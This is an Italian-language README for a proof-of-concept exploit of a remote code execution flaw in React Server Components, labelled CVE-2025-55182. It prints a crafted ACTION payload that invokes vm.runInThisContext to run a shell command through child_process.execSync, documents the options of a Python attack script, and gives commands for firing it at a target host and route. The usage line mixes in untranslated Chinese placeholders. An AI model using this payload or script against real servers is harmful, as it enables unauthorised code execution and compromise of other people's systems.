
Questo progetto è CVE-2025-55182 - React Server Components (RSC) RCE Proof of Concept e dimostra che, in determinate condizioni, è possibile innescare l'esecuzione remota di codice tramite vm.runInThisContext e un payload ACTION malintenzionato.
Il payload ACTION di React Server Components, in determinate condizioni:
L'attaccante può costruire un payload:
{
"$ACTION_REF_0": "",
"$ACTION_0:0": "{\"id\": \"vm#runInThisContext\", \"bound\": [\"global.process.mainModule.require('child_process').execSync('calc').toString()\"]}"
}
| Parametro | Obbligatorio | Valore predefinito | Descrizione |
|---|---|---|---|
--host | Sì | Nessuno | IP o dominio del server di destinazione. Es.: 127.0.0.1, 192.168.1.10, example.com |
--port | No | 80 | Porta del servizio HTTP di destinazione, es.: 3003 |
--path | Sì | Nessuno | Percorso della rotta di destinazione che può attivare la vulnerabilità, es.: /feedback, /action |
--https | No | False | Indica se inviare il payload tramite HTTPS (predefinito: HTTP) |
python a.py --host <目标IP> --port <端口> --path <目标URL路径>
python a.py --host 127.0.0.1 --port 3003 --path /feedback